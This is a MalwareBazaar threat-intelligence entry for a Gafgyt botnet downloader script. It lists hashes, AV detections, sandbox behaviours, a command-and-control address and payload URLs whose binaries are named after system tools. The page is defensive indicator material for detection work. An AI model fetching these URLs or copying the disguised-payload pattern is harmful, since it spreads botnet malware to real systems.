MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 907b8f2889becce57d44c9fbbda7bc1aa9f30058732db0414d1cc2e6ca623d9d. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Gafgyt


Vendor detections: 8


Intelligence 8 IOCs YARA 1 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 907b8f2889becce57d44c9fbbda7bc1aa9f30058732db0414d1cc2e6ca623d9d
SHA3-384 hash: 1e75f23b5e05436abacff96f49b92f8c8adef49cb44ea62c3b8cebd95b1f03b464e077ff12882003bdd8c2f02eec16f3
SHA1 hash: 17d9a92918a64b4da34126a8c18adb0c55e46ebe
MD5 hash: f32e085c1f729841641fb6b0fe73fc48
humanhash: gee-quiet-pasta-louisiana
File name:bins.sh
Download: download sample
Signature Gafgyt
Create hunting rule
File size:1'613 bytes
First seen:2025-12-02 04:48:52 UTC
Last seen:Never
File type: sh
MIME type:text/x-shellscript
ssdeep 48:vY1EYArYC+MYgrY2YlUYOYOY1UYCY/CYCYJ:vY1EYGY5MYgrY2YSYOYOYGYCY6YCYJ
TLSH T15C318BCB21D21C747D61D9A332ABC804B6E9A08619D95F8C7CED3CFA808DE447D44B93
TrID 70.0% (.SH) Linux/UNIX shell script (7000/1)
30.0% (.) Unix-like shebang (var.3) (gen) (3000/1)
Magika shell
Reporter abuse_ch
Tags:gafgyt sh
URLMalware sample (SHA256 hash)SignatureTags
http://82.22.184.67/ntpdc5cf89081aa6911272d7515084c87c5d672dee9c86a6308083c38b2b7b6f9e47 Gafgytelf gafgyt ua-wget
http://82.22.184.67/sshdc819761ed9dbbc82bc4f06a0e0433f0320bc59818b88b1076786b170e7599acb Gafgytelf gafgyt ua-wget
http://82.22.184.67/opensshb84a54d3f1b1e459d4eb0414d5d8305053c54a1b0bd6501c146d73a34b4bfe2c Gafgytelf gafgyt ua-wget
http://82.22.184.67/bash45fba85b86e49e3afab9453838c915cd478cb0bf01161885b56204b762ace746 Gafgytelf gafgyt ua-wget
http://82.22.184.67/tftpc622d8e30fa58d1cc21c02a72379e337dd8efe47a9e052fc40a0df593b1f6667 Gafgytelf gafgyt ua-wget
http://82.22.184.67/wgetfaa6e632e8a7dcde4c0761e94f007891a29633951ba7a8dd85adfc135d6927fc Gafgytelf gafgyt ua-wget
http://82.22.184.67/cron39f44253e84a39555f31886967b5c864a288bcd8b79a2ca2428d72dd4af3e20a Gafgytelf gafgyt ua-wget
http://82.22.184.67/ftp38f6fa209d541ad3e042ee21d5160d51c517e983987fcdf9b8c8654fc0031618 Gafgytelf gafgyt ua-wget
http://82.22.184.67/pftp31e40894c61560ec29d23fe6a32591c82add5acbe2de7b5f23c1b81e454cc47e Gafgytelf gafgyt ua-wget
http://82.22.184.67/sh07d061960ee63fcc7f6e5aa51227aa5f99d63255648719e8fdd5eea10d1b5a11 Gafgytelf gafgyt ua-wget
http://82.22.184.67/n/an/an/a
http://82.22.184.67/apache2020864676030c25fa4ca80159cf0138e6cb2ab26711d8936d89cd3903241b067 Gafgytelf gafgyt ua-wget
http://82.22.184.67/telnetdn/an/aelf ua-wget

Intelligence

File Origin
# of uploads :
1
# of downloads :
30
Origin country :
DE DE
Vendor Threat Intelligence
No detections
Detection(s):
Sanesecurity.Malware.30790.LX.BOT.UNOFFICIAL
Create hunting rule

SecuriteInfo.com.Linux.Downloader-29.UNOFFICIAL
Create hunting rule

SecuriteInfo.com.Linux.Downloader-6.UNOFFICIAL
Create hunting rule

SecuriteInfo.com.Linux.Downloader.CP-1.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
bash evasive lolbin
Link:
https://www.filescan.io/uploads/692e6fcb23d7ce46ce42dbee/reports/c83a159e-0c88-45ff-b4e5-29f0d4f6d74d/overview
Result
Gathering data
Score:
100%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/907b8f2889becce57d44c9fbbda7bc1aa9f30058732db0414d1cc2e6ca623d9d
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/907b8f2889becce57d44c9fbbda7bc1aa9f30058732db0414d1cc2e6ca623d9d/
Verdict:
Malicious
Threat:
Family.GAFGYT
Link:
https://tip.neiki.dev/file/907b8f2889becce57d44c9fbbda7bc1aa9f30058732db0414d1cc2e6ca623d9d
Threat name:
Linux.Downloader.Morila
Create hunting rule
Status:
Malicious
First seen:
2025-12-02 04:41:03 UTC
File Type:
Text (Shell)
AV detection:
24 of 36 (66.67%)
Threat level:
  3/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=sb5y6kejx3gok7kezh533j54dku7gacyomw3aqkndtbonstchwoq._file
Result
Malware family:
gafgyt
Create hunting rule
Score:
  10/10
Tags:
family:gafgyt botnet defense_evasion discovery linux
Link:
https://tria.ge/reports/251202-ffsayabl3t/
Behaviour
Writes file to tmp directory
Reads system network configuration
Reads system routing table
File and Directory Permissions Modification
Executes dropped EXE
Detected Gafgyt variant
Gafgyt family
Gafgyt/Bashlite
Malware Config
C2 Extraction:
82.22.184.67:4444
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/907b8f2889becce57d44c9fbbda7bc1aa9f30058732db0414d1cc2e6ca623d9d

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:ach_202412_suspect_bash_script
Create hunting rule
Author:abuse.ch
Description:Detects suspicious Linux bash scripts

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Gafgyt

sh 907b8f2889becce57d44c9fbbda7bc1aa9f30058732db0414d1cc2e6ca623d9d

(this sample)

Gafgyt

elf c5cf89081aa6911272d7515084c87c5d672dee9c86a6308083c38b2b7b6f9e47

  
URLhaus
https://urlhaus.abuse.ch/url/3722737/
  
Delivery method
Distributed via web download
  
URLhaus
https://urlhaus.abuse.ch/url/3722745/
  
URLhaus
https://urlhaus.abuse.ch/url/3722757/
  
Dropping
MD5 7f1323e83514c43f589b7f0b1b8f62e8
  
Dropping
SHA256 c5cf89081aa6911272d7515084c87c5d672dee9c86a6308083c38b2b7b6f9e47

Comments